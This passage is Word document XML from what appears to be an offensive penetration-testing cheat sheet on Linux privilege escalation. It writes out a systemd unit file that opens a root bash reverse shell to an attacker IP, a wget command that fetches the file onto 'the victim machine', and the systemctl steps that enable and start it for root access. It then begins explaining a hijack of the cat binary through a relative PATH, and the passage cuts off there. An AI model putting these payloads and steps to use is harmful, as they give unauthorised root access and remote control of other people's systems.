              <w:t>You will need to create this malicious .service file in your own machine and upload it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="791566AC" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BF0981C" w14:textId="3982DFC5" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="680856E4" w14:textId="19120BFC" w:rsidR="00EB0837" w:rsidRPr="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>malicious systemd unit file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B7D025F" w14:textId="16D02F2D" w:rsidR="00EB0837" w:rsidRDefault="00ED47EB" w:rsidP="00F26DBD">
            <w:r>
              <w:t>Use a text editor such as MousePad or Sublime to create this malicious systemd unit file. This will need to be uploaded to the victim machine</w:t>
            </w:r>
            <w:r w:rsidR="000306F5">
              <w:t xml:space="preserve"> (save it as </w:t>
            </w:r>
            <w:r w:rsidR="000306F5" w:rsidRPr="000306F5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r w:rsidR="000306F5" w:rsidRPr="000306F5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>.service</w:t>
            </w:r>
            <w:r w:rsidR="000306F5">
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7294C73C" w14:textId="01643478" w:rsidR="00ED47EB" w:rsidRPr="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
              <w:t>[Unit]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AC4746" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="3399FF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:t>=Root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3739A5" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB"/>
          <w:p w14:paraId="6DAB5A63" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRPr="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
              <w:t>[Service]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B77416" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="3399FF"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r>
              <w:t>=simple</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55ED4E07" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="3399FF"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
            <w:r>
              <w:t>=root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD73AD0" w14:textId="32CB4022" w:rsidR="00ED47EB" w:rsidRPr="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="25FFB1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="3399FF"/>
              </w:rPr>
              <w:t>ExecStart</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">=/bin/bash -c </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="25FFB1"/>
              </w:rPr>
              <w:t>'bash -i &gt;&amp; /dev/tcp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="25FFB1"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="25FFB1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF7EFFD" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB"/>
          <w:p w14:paraId="74BEA01D" w14:textId="77777777" w:rsidR="00ED47EB" w:rsidRPr="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="FF0066"/>
              </w:rPr>
              <w:t>[Install]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FA582C" w14:textId="50116541" w:rsidR="00ED47EB" w:rsidRDefault="00ED47EB" w:rsidP="00ED47EB">
            <w:r w:rsidRPr="00ED47EB">
              <w:rPr>
                <w:color w:val="3399FF"/>
              </w:rPr>
              <w:t>WantedBy</w:t>
            </w:r>
            <w:r>
              <w:t>=multi-user.target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000306F5" w14:paraId="6DE04376" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4510DAC2" w14:textId="5073B664" w:rsidR="000306F5" w:rsidRDefault="000306F5" w:rsidP="000306F5">
            <w:r>
              <w:t>90.</w:t>
            </w:r>
            <w:r w:rsidR="006D4A8D">
              <w:t>f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="760D899A" w14:textId="77777777" w:rsidR="000306F5" w:rsidRDefault="000306F5" w:rsidP="000306F5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Uploading the .service file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343F62C4" w14:textId="77777777" w:rsidR="001A2F9E" w:rsidRDefault="001A2F9E" w:rsidP="000306F5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32A50B23" w14:textId="4237B9A8" w:rsidR="001A2F9E" w:rsidRDefault="001A2F9E" w:rsidP="000306F5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0114FD55" w14:textId="77777777" w:rsidR="000306F5" w:rsidRDefault="000306F5" w:rsidP="000306F5">
            <w:r>
              <w:t>Either upload the file using the web page file upload functionality (see 90.c) or host a SimpleHTTPServer with the malicious file in the same directory (see 90.b). If you use the SimpleHTTPServer</w:t>
            </w:r>
            <w:r w:rsidR="001A2F9E">
              <w:t xml:space="preserve"> method, you can download the file via the victim’s machine:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1609C793" w14:textId="4E3335EB" w:rsidR="001A2F9E" w:rsidRDefault="001A2F9E" w:rsidP="000306F5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001A2F9E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">wget </w:t>
            </w:r>
            <w:r w:rsidRPr="001A2F9E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://OUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2F9E">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2F9E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="001A2F9E">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>FILE.service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A8FC36" w14:textId="299DE68E" w:rsidR="001A2F9E" w:rsidRDefault="001A2F9E" w:rsidP="000306F5">
            <w:r w:rsidRPr="001A2F9E">
              <w:t>You</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> may need to put your working directory location (on the victim machine) in a folder which allows wget to download and save the file (don’t forget to change the permissions if you need to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="006D4A8D">
              <w:t>using</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006D4A8D">
              <w:t xml:space="preserve"> chmod, see 90.c)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="544559C7" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F88E746" w14:textId="44F1A925" w:rsidR="00EB0837" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="521D52E7" w14:textId="2EBBA9C5" w:rsidR="00EB0837" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>systemctl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1831A642" w14:textId="1D1FD77B" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:r>
              <w:t>Once the malicious systemd unit file is downloaded, run the systemctl like so:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7BA51E" w14:textId="0C6BD9E7" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(Or wherever it is located)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A786D0D" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">./systemctl </w:t>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">enable </w:t>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp/FILE.service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(Or wherever it is located)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5565EFF3" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="00F26DBD">
            <w:r>
              <w:t>You should see a similar message to this…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77A72410" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRPr="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="006D4A8D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AEB98F3" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="006D4A8D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4A8D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Created symlink from /etc/systemd/system/root.service to /tmp/root.service.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3273A4FA" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="006D4A8D">
            <w:r>
              <w:t>Once the terminal window gives you control back, enter:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370BA1F7" w14:textId="77777777" w:rsidR="006D4A8D" w:rsidRDefault="006D4A8D" w:rsidP="006D4A8D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BD36D9" w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">./systemctl </w:t>
            </w:r>
            <w:r w:rsidR="00BD36D9" w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">start </w:t>
            </w:r>
            <w:r w:rsidR="00BD36D9" w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r w:rsidR="00BD36D9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BD36D9" w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(The name of the FILE.service; if not, try root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A024607" w14:textId="3C244256" w:rsidR="00BD36D9" w:rsidRPr="00BD36D9" w:rsidRDefault="00BD36D9" w:rsidP="006D4A8D">
            <w:r w:rsidRPr="00BD36D9">
              <w:t xml:space="preserve">And finally, check the netcat listener on port </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD36D9">
              <w:t>(see 90.a), you should</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> have</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD36D9">
              <w:t xml:space="preserve"> root access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> if all has gone as planned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="722F360A" w14:textId="77777777" w:rsidR="00C714B0" w:rsidRDefault="00C714B0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87B875" w14:textId="152D54F7" w:rsidR="00C714B0" w:rsidRDefault="00C714B0" w:rsidP="00C714B0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Changing the ‘cat’ command</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BB63D6" w14:paraId="17BB4B92" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="45C96500" w14:textId="6B60DA85" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A348CF0" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="00AA366F" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Terminal Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0FA828" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C714B0">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF A SCRIPT IS RUN WHICH CALLS THE CAT BINARY FROM A RELATIVE PATH, THIS EXPLOIT MAY PROVE USEFUL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB2DF9F" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0539AF7B" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r w:rsidRPr="00C714B0">
              <w:t>First off</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, know that the </w:t>
            </w:r>
            <w:r w:rsidRPr="00C714B0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> command runs the cat binary file which is usually found in </w:t>
            </w:r>
            <w:r w:rsidRPr="00C714B0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r w:rsidRPr="00C714B0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin </w:t>
            </w:r>
            <w:r w:rsidRPr="00C714B0">
              <w:t>directories</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on a Linux/Unix machine</w:t>
            </w:r>
            <w:r w:rsidRPr="00C714B0">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> When you enter the </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command the executable </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/bin/cat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (or </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin/cat</w:t>
            </w:r>
            <w:r>
              <w:t>) gets executed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110DB78F" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6"/>
          <w:p w14:paraId="5647B36D" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>This means if a file or script wants to execute this binary command to output text to the screen, and a relative path is used (meaning we can alter where the script/file looks for the cat binary on the machine), then it may be possible to create an evil twin file of ‘cat’ and change the code inside the file to be a simple malicious script.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="02730E0E" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="074ED3E5" w14:textId="4C0FC69A" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76239FFA" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="00AA366F" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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4FBD24F8" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
